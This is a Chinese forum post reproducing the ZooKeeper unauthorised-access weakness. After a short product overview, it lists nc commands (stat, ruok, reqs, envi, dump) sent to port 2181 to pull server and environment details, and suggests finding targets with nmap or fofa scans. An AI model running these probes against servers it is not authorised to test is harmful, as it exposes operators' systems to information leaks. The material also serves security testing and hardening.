web渗出测试漏洞复现:ZooKeeper未授权漏洞复现

种地  金牌会员 | 2024-8-15 19:06:31 | 显示全部楼层 | 阅读模式
打印 上一主题 下一主题

主题 960|帖子 960|积分 2880

1. ZooKeeper未授权漏洞复现

1.1 ZooKeeper简介

ZooKeeper 是一个分布式的、开源的和谐服务,最初由雅虎开辟,现隶属于 Apache 软件基金会,是Google的Chubby一个开源的实现,是Hadoop和Hbase的紧张组件,旨在为大型分布式系统提供一致性的服务。ZooKeeper 的设计目的是简化分布式应用步伐的开辟和维护,它通过提供一组简单易用的原语和数据模子,为分布式系统中的进程提供协作服务。
ZooKeeper默认开启在2181端口,在未进行任何访问控制情况下,攻击者可通过执行envi命令得到系统大量的敏感信息,包罗系统名称、Java情况。
1.2 ZooKeeper漏洞复现

1.利用nmap或者fofa扫描发现端口2181或者服务
2.利用根本命令格式:echo 命令|nc 目标ip 目标端口
  1. stat:列出关于性能和连接的客户端的统计信息。
  2. echo stat | nc 127.0.0.1 2181
  3. ruok:测试服务器是否运行在非错误状态。
  4. echo ruok | nc 127.0.0.1 2181
  5. reqs:列出未完成的请求。
  6. echo reqs | nc 127.0.0.1 2181
  7. envi:打印有关服务环境的详细信息。
  8. echo envi | nc 127.0.0.1 2181
  9. dump:列出未完成的会话和临时节点。
  10. echo dump  | nc 127.0.0.1 2181
复制代码
echo envi |nc 127.0.0.1 2181


免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
回复

使用道具 举报

0 个回复

正序浏览

快速回复

您需要登录后才可以回帖 登录 or 立即注册

本版积分规则

种地

金牌会员
这个人很懒什么都没写!

标签云

快速回复 返回顶部 返回列表